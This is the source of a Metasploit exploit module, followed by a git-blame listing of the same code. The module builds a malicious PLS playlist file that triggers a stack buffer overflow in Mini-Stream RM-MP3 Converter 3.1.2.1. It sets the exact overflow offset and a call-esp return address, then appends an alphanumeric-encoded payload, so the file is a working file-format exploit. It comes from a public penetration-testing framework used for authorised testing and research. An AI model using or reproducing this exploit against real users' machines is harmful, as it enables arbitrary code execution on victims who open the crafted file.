modules/exploits/windows/fileformat/mini_stream_pls_bof.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Mini-Stream RM-MP3 Converter v3.1.2.1 PLS File Stack Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack based buffer overflow found in Mini-Stream RM-MP3
        Converter v3.1.2.1. The overflow is triggered when an unsuspecting victim
        opens the malicious PLS file.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Madjix',           # original discovery
          'Tiago Henriques',  # metasploit module
          'James Fitts <fitts.james[at]gmail.com>'  # clean ups
        ],
      'References'     =>
        [
          [ 'CVE', '2010-5081' ],
          [ 'OSVDB', '78078' ],
          [ 'EDB', '14373' ],
          [ 'BID', '34514' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'DisablePayloadHandler' => true
        },
      'Payload'        =>
        {
          'Space' => 1500,
          'BadChars' => "\x00\x09\x0a",
          'DisableNops' => 'True',
          'StackAdjustment' => -3500,
          'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
          'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
          'EncoderOptions' =>
            {
              'BufferRegister' => 'ECX',
            },
        },
      'Platform' => 'win',
      'Targets'        =>
        [
          [
            'Mini-stream RM-MP3 Converter v3.1.2.1.2010.03.30',
            {
              'Ret' => 0x100371f5, # call esp in MSRMfilter03.dll
              'Offset' => 17417
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Jul 16 2010',
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('FILENAME', [ true, 'The file name.',  'msf.pls']),
        ])
  end

  def exploit

    pls =  "http://"
    pls << rand_text_alpha_upper(target['Offset'])
    pls << [target.ret].pack('V')
    pls << rand_text_alpha_upper(8)
    pls << payload.encoded

    print_status("Creating '#{datastore['FILENAME']}' file ...")

    file_create(pls)

  end
end
Add feature #5779 2011-11-14 01:49:26 -06:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Add feature #5779 2011-11-14 01:49:26 -06:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
Retab modules 2013-08-30 16:28:54 -05:00			`Rank = GreatRanking`
Add feature #5779 2011-11-14 01:49:26 -06:00
Retab modules 2013-08-30 16:28:54 -05:00			`include Msf::Exploit::FILEFORMAT`
Add feature #5779 2011-11-14 01:49:26 -06:00
Retab modules 2013-08-30 16:28:54 -05:00			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Mini-Stream RM-MP3 Converter v3.1.2.1 PLS File Stack Buffer Overflow',`
			`'Description' => %q{`
			`This module exploits a stack based buffer overflow found in Mini-Stream RM-MP3`
			`Converter v3.1.2.1. The overflow is triggered when an unsuspecting victim`
			`opens the malicious PLS file.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'Madjix', # original discovery`
			`'Tiago Henriques', # metasploit module`
			`'James Fitts <fitts.james[at]gmail.com>' # clean ups`
			`],`
			`'References' =>`
			`[`
Fix CVE numbers 2018-07-09 13:22:08 -05:00			`[ 'CVE', '2010-5081' ],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '78078' ],`
Retab modules 2013-08-30 16:28:54 -05:00			`[ 'EDB', '14373' ],`
			`[ 'BID', '34514' ]`
			`],`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'process',`
replace strings with bools 2020-01-14 20:47:27 -05:00			`'DisablePayloadHandler' => true`
Retab modules 2013-08-30 16:28:54 -05:00			`},`
			`'Payload' =>`
			`{`
			`'Space' => 1500,`
			`'BadChars' => "\x00\x09\x0a",`
			`'DisableNops' => 'True',`
			`'StackAdjustment' => -3500,`
			`'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",`
			`'EncoderType' => Msf::Encoder::Type::AlphanumUpper,`
			`'EncoderOptions' =>`
			`{`
			`'BufferRegister' => 'ECX',`
			`},`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`[`
			`'Mini-stream RM-MP3 Converter v3.1.2.1.2010.03.30',`
			`{`
			`'Ret' => 0x100371f5, # call esp in MSRMfilter03.dll`
			`'Offset' => 17417`
			`}`
			`]`
			`],`
			`'Privileged' => false,`
			`'DisclosureDate' => 'Jul 16 2010',`
			`'DefaultTarget' => 0))`
Add feature #5779 2011-11-14 01:49:26 -06:00
Retab modules 2013-08-30 16:28:54 -05:00			`register_options(`
			`[`
			`OptString.new('FILENAME', [ true, 'The file name.', 'msf.pls']),`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
Retab modules 2013-08-30 16:28:54 -05:00			`end`
Add feature #5779 2011-11-14 01:49:26 -06:00
Retab modules 2013-08-30 16:28:54 -05:00			`def exploit`
Add feature #5779 2011-11-14 01:49:26 -06:00
Retab modules 2013-08-30 16:28:54 -05:00			`pls = "http://"`
			`pls << rand_text_alpha_upper(target['Offset'])`
			`pls << [target.ret].pack('V')`
			`pls << rand_text_alpha_upper(8)`
			`pls << payload.encoded`
Add feature #5779 2011-11-14 01:49:26 -06:00
Retab modules 2013-08-30 16:28:54 -05:00			`print_status("Creating '#{datastore['FILENAME']}' file ...")`
Add feature #5779 2011-11-14 01:49:26 -06:00
Retab modules 2013-08-30 16:28:54 -05:00			`file_create(pls)`
Add feature #5779 2011-11-14 01:49:26 -06:00
Retab modules 2013-08-30 16:28:54 -05:00			`end`
Add feature #5779 2011-11-14 01:49:26 -06:00			`end`